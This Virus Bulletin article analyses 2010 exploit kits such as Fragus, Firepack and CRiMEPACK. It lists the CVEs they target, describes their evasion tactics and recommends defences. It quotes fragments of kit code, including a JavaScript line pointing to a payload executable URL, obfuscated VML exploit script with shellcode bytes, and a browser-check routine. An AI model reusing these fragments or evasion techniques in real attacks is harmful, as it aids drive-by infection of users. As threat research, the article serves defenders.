Exploit kit explosion – part two: vectors of attack


Mark Davis

Editor: Helen Martin


After introducing a multitude of exploit frameworks used in drive-by browser-based attacks in his last article, this month Mark Davis details the functionality of frameworks, focusing on attack vectors (exploits) and counter-intelligence efforts.

Last month I introduced a multitude of exploit frameworks used in drive-by browser-based attacks (see VB, April 2010, p.21). Most are programmed in PHP and SQL, selling for a few hundred dollars or more in a competitive criminal market. Common exploit frameworks include Eleonore, Fragus, Neosploit, Yes! and more. The aim of this follow-up article is to detail the functionality of frameworks, focusing on attack vectors (exploits) and counter-intelligence efforts.

It should be noted that analysis of exploit frameworks is more of an art than a science. Incomplete data sets, demo kits and behavioural testing frequently fail to properly identify all the attack vectors of a given kit. Slang terms and/or misidentification of exploit vectors and files are commonly found when referencing open-source intelligence documentation for such frameworks. Additionally, the development and distribution of these threats is dynamic, with the threats constantly being upgraded and/or deployed privately, resulting in different configurations and capabilities of the same attack kit in different incidents. In other situations CVE numbers are deprecated, CLSIDs are not specific enough, and/or exploited vulnerabilities exist in potentially unwanted applications such as Zango adware.

It is difficult to properly qualify each attack vector and exploit in a lab. Every effort has been made to scan all files, analyse source code, and correlate back to exploit strings, CVEs and other attack data for each exploit framework attack vector reported on in this document. The author welcomes feedback and additional data to continue to research and report on such threats as they emerge (please contact editor@virusbtn.com).


Before diving into exploits, what is your own theory about the prevalence of the various exploit vectors used in exploit frameworks? Do you believe kits contain as many exploits as possible? Or perhaps an exploit framework only includes the most recent or zero-day attack vectors? Do kits commonly beg, borrow, and steal so that most kits contain the same exploits? What are the most targeted vectors – Internet Explorer, Firefox, Adobe Reader, Flash, Java and others? The results of a large-scale aggregate review of exploit frameworks in the wild may surprise you. The following are the findings after an analysis of about two dozen exploit frameworks.

Exploit kits actually contain a wide range of diverse exploits impacting many different products. Some, such as Neosploit, include exploitation of vulnerabilities not included in other kits (Neosploit is alone in containing ‘Buffer Overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll in Gretech Online Movie Player’ (CVE-2007-5779)). In reviewing a comprehensive list of attack vectors the data shown in Table 1 emerged, showing the exploit vectors for all kits analysed in the wild to date.

Microsoft Internet Explorer 7 iepeers.dll Use After Free VulnerabilityCVE-2010-0806
Microsoft Internet Explorer 8 Use After Free VulnerabilityCVE-2010-0249
Adobe Reader 9.3 Acroform.api TIFF Image Handler Stack-Based Buffer Overflow VulnerabilityCVE-2010-0188
Adobe Acrobat 9.2 newPlayer() Improper Initialization VulnerabilityCVE-2009-4324
Sun Java Runtime Environment 6 Update 16 getSoundbank() Stack-Based Buffer Overflow VulnerabilityCVE-2009-3867
Adobe Acrobat 9.1.3 U3D CLODProgressiveMeshContinuation Array Index Input ValidationCVE-2009-2990
Mozilla Firefox 3.5 (Font Tags) Remote Buffer OverflowCVE-2009-2477
Microsoft Windows Server 2008 Service Pack 2 Telnet Server Unspecified VulnerabilityCVE-2009-1930
Flash 10, Adobe Reader & AcrobatCVE-2009-1862
Adobe Reader 9.1 getAnnots() Function Buffer Overflow VulnerabilityCVE-2009-1492
ActiveX Control vulnerability is MS Office Web ComponentsCVE-2009-1136
Adobe Reader ‘Collab.getIcon()’ Stack-Based Buffer Overflow VulnerabilityCVE-2009-0927
Uninitialized Memory Corruption VulnerabilityCVE-2009-0075
Sun Java Runtime Environment 6 Update 10 Deserializing Calendar Objects Unspecified VulnerabilityCVE-2008-5353
MS Internet Explorer XML Parsing VulnerabilityCVE-2008-4844
Windows Media Encoder wmex.dll ActiveX ControlCVE-2008-3008
Adobe Reader 8.1.2 ‘util.printf’ Stack-Based Buffer Overflow VulnerabilityCVE-2008-2992
Microsoft Access 2003 Snapshot Viewer ActiveX Control Unspecified VulnerabilityCVE-2008-2463
Aurigma ImageUploader ActiveX Control Stack-Based Buffer OverflowsCVE-2008-1490
CA Multiple Products DSM ListCtrl ActiveX Control Buffer Overflow VulnerabilityCVE-2008-1472
Adobe Reader 8.1.1 ‘Collab.collectEmailInfo()’ Stack-Based Buffer Overflow VulnerabilityCVE-2008-0655
Yahoo! Music Jukebox YMP Datagrid ActiveX Control Stack Buffer OverflowsCVE-2008-0623
Microsoft Video (DirectShow) ActiveX Control VulnerabilityCVE-2008-0015
Stack-Based Buffer Overflow in AOL AOLMediaPlaybackControlCVE-2007-6250
QuickTime RTSP Response VulnerabilityCVE-2007-6166
Buffer Overflow in the GomManager ActiveX Control in GomWeb3.dll in Gretech Online Movie PlayerCVE-2007-5779
Adobe Reader 8.1.1 JavaScript Argument-Handling Buffer-Overflow VulnerabilityCVE-2007-5659
RealPlayer Stack-Based Buffer Overflow in the Database Component in MPAMedia.dllCVE-2007-5601
Opera Web Browser Invalid Pointer Remote Code Execution VulnerabilityCVE-2007-4367
Yahoo! Webcam view Utilities ActiveX Control Vulnerable to Arbitrary Code ExecutionCVE-2007-3147, CVE-2007-3148
Zenturi ProgramChecker ActiveX Remote Buffer OverflowCVE-2007-2987
WordOCX ActiveX control in WordViewer.ocx
Adobe Inc. Flash Player Flash File NULL Pointer Dereference VulnerabilityCVE-2007-0071
Microsoft Windows Animated Cursor Remote Code Execution VulnerabilityCVE-2007-0038
Vulnerability in Vector Markup Language Could Allow Remote Code ExecutionCVE-2007-0024
Buffer Overflow in Apple QuickTime 7.1.3CVE-2007-0015
WinZip FileView ActiveX Controls CreateNewFolderFromName() Method Buffer OverflowCVE-2006-6884
Adobe Acrobat AcroPDF ActiveX Control Fails to Properly Handle Malformed InputCVE-2006-6027
AOL SuperBuddy ActiveX Control ‘LinkSBIcons()’ Code Execution VulnerabilityCVE-2006-5820
Vulnerability in Microsoft XML Core Services Could Allow Remote Code ExecutionCVE-2006-5745
Multiple Heap-Based Buffer Overflows in AOL Nullsoft WinAmp Before 5.31CVE-2006-5567
Vulnerability in Microsoft Data Access Components Allows Code ExecutionCVE-2006-5559
DirectAnimation ActiveX Controls Memory Corruption VulnerabilitiesCVE-2006-4777
Vulnerability in Visual Studio 2005 Could Allow Remote Code ExecutionCVE-2006-4704
Mozilla Firefox JavaScript Navigator Object Remote Code Execution VulnerabilityCVE-2006-3677
Vulnerability in Microsoft Management Console Could Allow Remote Code ExecutionCVE-2006-3643
Microsoft Windows Media Player Plugin Buffer Overflow VulnerabilityCVE-2006-0005
Microsoft Windows Server 2003 Service Pack 1 RDS.Dataspace ActiveX Control Access Control VulnerabilityCVE-2006-0003
MSMicrosoft ‘msdds.dll’ COM Object Lets Remote Users Execute Arbitrary Code COM exploits – Generic Code Execution for IE ActiveX objects RDS.DataControl, WMIScriptUtils, and moreCVE-2005-2127
Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code ExecutionCVE-2004-1049
Integer Overflow in Apple QuickTimeCVE-2004-0431
Java Bytecode VerifierCVE-2003-0111
Foxit Reader 3.0. PDF ExploitN/A
SPL Amaya 11N/A
Windows Media Player 11 ActiveX launchURL() Files DownloadN/A
DownloadAndExec() Zango Adware ExploitsN/A

Table 1. Exploit vectors for all kits analysed in the wild to date.

Exploit frameworks tend not to share such vectors. Unlike ‘the year of the bot’ in 2004, when the source code for Phatbot, MyDoom and other high-profile malicious programs was made available in the underground and shared widely amongst threats, exploits are held very tightly by criminals in 2010. This is likely for competitive advantage. One theory behind the release of various source codes in 2004 was to defer culpability, with the thought that if someone got arrested they wouldn’t be the only one to be in possession of the source code for a powerful threat, or they could claim that a trojan uploaded it to their computer. In 2010 the very clear operating procedure for criminals is to undercut a mature market to develop goods and services for financial gain.

The most commonly exploited vulnerabilities amongst multiple kits are listed below:


  • Uninitialized Memory Corruption Vulnerability

  • Mozilla Firefox 3.5 (Font Tags) Remote Buffer Overflow


  • Microsoft Windows Server 2003 Service Pack 1 RDS.Dataspace ActiveX Control Access Control Vulnerability

  • Microsoft Windows Server 2008 Service Pack 2 Telnet Server Unspecified Vulnerability

  • Microsoft Video (DirectShow) ActiveX Control vulnerability

  • Microsoft Access 2003 Snapshot Viewer ActiveX Control Unspecified Vulnerability

  • ActiveX Control Vulnerability in MS Office Web Components

  • Microsoft Windows Media Player Plug-in Buffer Overflow Vulnerability

Adobe (PDF/Flash):

  • Adobe Inc. Flash Player Flash File NULL Pointer Dereference Vulnerability

  • Adobe Reader 8.1.1 ‘Collab.collectEmailInfo()’ Stack-Based Buffer Overflow Vulnerability

  • Adobe Reader ‘Collab.getIcon()’ Stack-Based Buffer Overflow Vulnerability

  • Adobe Reader 8.1.2 ‘util.printf’ Stack-Based Buffer Overflow Vulnerability


  • Buffer Overflow in Apple QuickTime 7.1.3


  • Sun Java Runtime Environment 6 Update 10 Deserializing Calendar Objects Unspecified Vulnerability

The list of the most common vectors reveals a divergence of attack vectors. Attacks are not just focused on Adobe Reader (PDF) files but also on Flash, QuickTime, Java, Windows, Office and browser-based vectors. Diversity is one of the keys to maximizing exploitation and driving up sales of an exploit framework. Average exploitation on kits is around 20 per cent if they are current and well distributed for targeted victims.

Fragus is a popular exploit kit seen in the wild in 2009 and 2010. Figure 1 shows a small number of infections at the time of anlaysis. Of those infections, MDAC ranks at the top of the list, with PDF ranking second highest. The highest percentage of effective attacks is aolwinamp with 100% success, while MDAC has only 37.5% success. This suggests that, although MDAC is not as successful as other exploits, it is still being used against a target audience that may be using older versions of Internet Explorer and/or systems that are not fully patched or legal. Other exploits are often a backup for kit authors as they seek to attack with older scripts and then use more recent ones later. Other kits have a priority system that can easily be managed to prioritize the way exploits are launched, as seen in the Unique Pack example shown in Figure 2.

Fragus statistics

Figure 1. Fragus statistics

Unique Pack

Figure 2. Unique Pack

Leading exploit frameworks are rapidly upgraded to include new attack vectors. For example, the Java deserializing issue was implemented in several top kits within 30 days of it first being used by a kit in the wild. This is likely not due to it being shared amongst kit creators, but to the creators of the top kits competing with one another for market share within their industry.

The type of exploit is less of an issue than several years ago when buffer overflows were the common vector of exploitation. Vulnerabilities exploited by kits range from buffer overflows to memory corruption, design errors, input validation, boundary condition errors and more. What matters is that the vulnerability is reliable and fits well within the browser-based drive-by exploitation model. As such, exploitation has matured from purely browser-based vulnerabilities to targeting third-party applications integrated into browsers such as Adobe Reader (PDF), Java, Flash and similar tools. Neosploit is a prime example of this, implementing the ‘Aurigma ImageUploader ActiveX Control Stack-Based Buffer Overflows’ exploit to take advantage of a vulnerability related to software for Facebook, MySpace and similar social networking sites in 2008. By developing such exploits within a kit, its creators gained an exclusive edge over other kits, were able to target a specific audience of interest, and increase the exploitation success rate.

The average exploit framework exploits eight vulnerabilities. The more comprehensive frameworks are as follows: Eleonore, Fragus, YES!, Fiesta, Shamans Dream Pack, Unique Pack, Liberty and Papka Pack (these ranging from 11 to 17 exploits per kit).

One final trend is the avoidance of legacy exploit vectors. Legacy exploit vectors are commonly easily spotted by IDS/IPS solutions and are more likely to lead to detection and shutdown/blacklisting of an exploit framework domain or IP. As a result, older vulnerabilities are not used in or are retired from exploit frameworks. With that said, can you guess which vulnerability is the most common older vector used in multiple kits? Believe it or not, it’s the infamous MDAC vulnerability from 2006 (CVE-2006-0003). This is likely due to the raving success claimed by many criminals when using this vulnerability. It is likely that newer vulnerabilities considered of high value to criminals will also sustain longevity in exploit framework kits, most notably the recent Java deserialization vulnerability (CVE-2008-5353).


Criminals are professionals too and they have implemented a wide range of counter-intelligence capabilities. Specific to exploit frameworks there is now intelligence behind tracking and responding to specific IPs, performing a staged attack, implementing obfuscation, randomization and encryption, anti-sandbox features, and blacklist notifications. While this is not a comprehensive list, these are the most common counter-intelligence features seen in the wild in 2010.

IP management

Exploit frameworks always include some sort of web-based exploitation statistics. To track geographic spread, the IP addresses of infected computers are captured and correlated with a GeoIP database. The exploit framework stores this information in a database along with a country code for displaying statistics to the criminal.

Part of IP management in 2010 includes one-time IP payload management. If an IP is recognized as already having visited a site, the exploit framework may do something different with that session rather than launch exploits against the computer. In many cases a redirection to a common site like www.google.com is performed when a site is visited for the second time.

More recently exploit frameworks have begun to collect and archive historical intelligence against banned IPs. This is similar to work done via avtracker.info [1]. The concept is simple: track the IPs that regularly visit a hostile site to block security researchers and/or automated analysis of an exploit framework. Over a period of time this forces security researchers to proxy or otherwise modify the visiting IP of a computer investigating an exploit framework.

In some cases exploit frameworks may also present fake error messages. For example, Fragus presents what appears to be a 404 error page when in fact it is silently exploiting in the background, using heavily obfuscated JavaScript.

Staged attacks

Attacks are sometimes performed only after triage of a visiting computer. It is now common for exploit frameworks to collect metrics on the OS, browser, referral (the last domain visited by the browser), whether Java is used, and more. This information is then used conditionally by some kits to stage attacks. This involves a simple hierarchy of conditional statements, such as numbering the sequence in which to launch exploits. Another way to manage this is shown in the Firepack kit index.php script where it looks for IE 6, and if found, attempts to exploit it. If IE 6 is not found, the user is directed to error.php:

if ($brow==”MSIE”)
  if ($ver==”6”)

     include ‘error.php’; exit;
     //header(“location: $redir”);

Obfuscation, randomization and encryption

Msie.php, used in the above Firepack example, is also an excellent example of obfuscation, randomization and encryption used in an exploit framework attack. In this case msie.php begins with a payload URL and a randomization function:

function smc() {
$b = ‘<Script Language=”JavaScript”>
var url1=”http://k0d.biz/sfile.exe”;
var rndmz = Math.round(Math.random()*99999);

The exploit begins several lines later where JavaScript is used to obfuscate the CLSID to avoid easy identification by IDS/IPS and anti-virus software:

function buff() {
var z_obj = document.createElement(b5+b6);

Additional JavaScript contains the variables a1, a2, etc., which decodes to CLSID BD96C556-65A3-11D0-983A-00C04FC29E36. A quick search reveals that this is the infamous MDAC exploit that is still used in kits even after four years of use in the wild, because there are still computers running IE 6 that are vulnerable to the attack.

Other obfuscation tactics may also exist in kits, such as base64. It is common to find strings in source code such as ‘echo base64_decode($h); }’, revealing such functionality. Take, for example, a VML base64-encoded string:



A base64 decoding of this data yields the following hostile script that was embedded inside a VML exploit function for Firepack:

var lx0=”<”; var lx1=”v:r”; var lx2=”ect”; var lx3=”>”; var lx4=”v:f”; var lx5=”ill “; var lx6=”met”;
var lx7=”ho”; var lx8=”&#x”; var lx9=”06”; var nx0=”3500”; var nx1=”x30000”; var nx2=”0”; var nx3=1;
var xlxl0=”%”; var xlxl1=”u”; var xlxl2=”9090”;
var xlxl00=”%u4343%u4343%u0feb%u335b%u66c9%u80b9%u80


Notice that the last variable includes a new obfuscated data set. It may also contain foreign characters. Additionally, various character set conversions may be required for translation by an analyst. While the decoding of such data is not difficult, many layers of obfuscation of different types hinder both automated and manual analysis of such scripts and this tactic does lower detection and mitigation rates.

Encryption is also becoming increasingly common in both exploit frameworks and malicious code, to subvert analysis and identification of hostile traffic. Below is a snippet of code taken from the Firepack kit related to ‘crypt.php’:

function rc4Encrypt($key, $pt) {
     $s = array();
     for ($i=0; $i<256; $i++) {
           $s[$i] = $i;


Development of anti-sandbox analysis capabilities is a growing trend in exploit frameworks. Initially, the most well-known sandboxes were targeted by kit developers, but in 2010 developers have also started to counter lesser-known analysis tools such as JSunPack and Wepawet, as seen in CRiMEPACK. This reveals a more in-depth understanding of the tools and tactics utilized by security experts in the field.

Security blacklisting notification

Some kits are capable not only of blacklisting by specific IP, but also of monitoring popular online sources such as malwaredomainlist and others and providing notification when exploit sites are blacklisted. CRiMEPACK is one of the more recent kits and one of the most robust in this area, providing automatic notifications to the users of the kit if their exploit sites populate the following sources:

  • Google Safe Browsing

  • hpHosts

  • Norton SafeWeb

  • Malc0de

  • Malwaredomainlist

  • Malwareurl

  • McAfee SiteAdvisor

  • My WebOfTrust

This type of counter-intelligence enables actors to know immediately and/or automate when changes to an exploit domain or IP may need to be made, thus maximizing fast flux or Avalanche-campaign-type strategies. While the integration of these two services (blacklisting counter-tactics utilizing fast flux/Avalanche) has not yet been fully realized in kits to date, it seems likely that it is not far away given the affiliations behind such attacks and the mutual interest of criminals to integrate such services. Such developments may significantly impact the prevalence and survivability of exploit frameworks online, greatly benefiting them while outpacing the security industry at large.


There are plenty of best practices that significantly reduce the likelihood of an attack on an enterprise or consumer computer. Obviously, aggressive patching and auditing of security policies is critical to avoid exploitation by a wide range of possible vulnerabilities. Additionally, a multi-layered defence model using anti-virus, firewall, IDS/IPS and a host of other tools and services helps to protect against drive-by threats. It’s worth nothing that patching isn’t just about Windows any longer but also the third-party applications regularly targeted in drive-by attacks, such as Adobe Reader, Flash, QuickTime and similar add-ons.

Data Execution Prevention (DEP) is one tool that helps even against unknown threats (zero-day exploits). When implemented for all programs it works very well to prevent common vectors of attack. Be cautioned, though, that when used with just Internet Explorer 7 and later, DEP is not fully effective. It has mixed results in dealing with IE-specific exploits. Additionally, DEP for Firefox, Adobe Reader and other tools typically relies on the Windows DEP settings rather than the individual program. As such, the baseline best practice is to enable DEP for all programs and exclude any tools that absolutely must be excluded (keep to a minimum). When properly configured, even computers vulnerable to attack avoid exploitation thanks to DEP blocking the action prior to exploitation.

A single notable exception exists with regard to DEP mitigation: Java. Because it runs in its own sandboxed environment, behaviourally all bets are off for DEP. In lab tests performed using Java exploits from actual kits in the wild, DEP settings did not impact such attacks. Additionally, unconfirmed third-party research on the Internet indicates that Java is not as well updated or managed as other third-party applications, such as Adobe Reader. As such, the overall risk for this vector is increased, which likely drives up exploitation numbers and further encourages criminals to focus on this vector of attack. More seriously, the recent deserialization issue that was implemented in several top kits in late 2009 and early 2010 is considered the ‘Holy Grail’ by some criminals. Not unlike the massive impact of MDAC, the deserialization issue has great potential to be one of the most sought after and most commonly used exploits going forth.

One final note on Java: codes like that of Bankpatch actually look for Java and, if found, upload a patched version of Java to ensure that financial fraud is possible no matter how online sessions are managed. The securing and aggressive auditing of Java must be at the top of all enterprise risk priorities to mitigate such risk.

On the IDS/IPS network layer it is also possible to implement multiple solutions to help mitigate exploit frameworks. For example, top exploit frameworks such as Eleonore, Liberty and others use the shorthand string ‘spl’ for ‘sploit’ in their exploit strings:



Zeus – a top payload in the wild (exploit packs not identified here):






Notice that ‘spl=’ is typically followed by an identification of the exploit, which is helpful both in identification and mitigation. The examples above include PDF exploits, MDAC and DirectShow. In other cases it is common for numbers to be assigned to each exploit vector, such as ‘1’, ‘2’, etc. Behavioural tests and script reviews often reveal the numbers assigned to each exploit within a kit.

While performing additional research for this article queries for ‘spl=’ for hostile domain data revealed a new exploit attack and a possible new kit called ZPack (shown above). While it appears that this may be related to an Eleonore exploit framework, further investigation is underway to better understand the ZPack attribution. This is a prime example of how understanding common URI elements (‘spl=’ query search in this example) in exploit strings is very helpful in identifying unknown exploit sources, strings and related attacks on a network.


This two-part series has introduced the exploits kits that are contributing to an explosion of such frameworks to facilitate criminal fraud operations. 2010 marks an important period of maturation in the criminal marketplace for exploit frameworks, where basic functionality and rapid adoption of exploits is now the norm. This necessitates advanced features of kits just now emerging including advanced encryption and obfuscation tactics, zero-day exploits customized in kits, the use of loaders to maximize payload distribution and affiliate operations management, and advanced security notifications and counter-tactics utilized by the users of such frameworks.



Latest articles:

Excel Formula/Macro in .xlsb?

Excel Formula, or XLM – does it ever stop giving pain to researchers? Kurt Natvig takes us through his analysis of a new sample using the xlsb file format.

Decompiling Excel Formula (XF) 4.0 malware

Office malware has been around for a long time, but until recently Excel Formula (XF) 4.0 was not something researcher Kurt Natvig was very familiar with. In this article Kurt allows us to learn with him as he takes a deeper look at XF 4.0.

APT vs Internet service providers – a threat hunter's perspective

Organizations in the telecommunications sector are faced with a multitude of threats, ranging from targeted attacks to malicious actions attributable to the criminal or activist world. Telsy researcher Emanuele De Lucia reports what he observed in…

VB2019 paper: APT cases exploiting vulnerabilities in region‑specific software

Some APT attacks are carried out by exploiting vulnerabilities in region-specific software. Government agencies frequently use such localized software, and this tends to be the target of attackers. In Japan, there have been many cases where attacks…

Detection of vulnerabilities in web applications by validating parameter integrity and data flow graphs

Web application vulnerabilities are an important entry vector for threat actors. In this paper researchers Abhishek Singh and Ramesh Mani detail algorithms that can be used to detect SQL injection in stored procedures, persistent cross-site scripting…

Bulletin Archive

We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.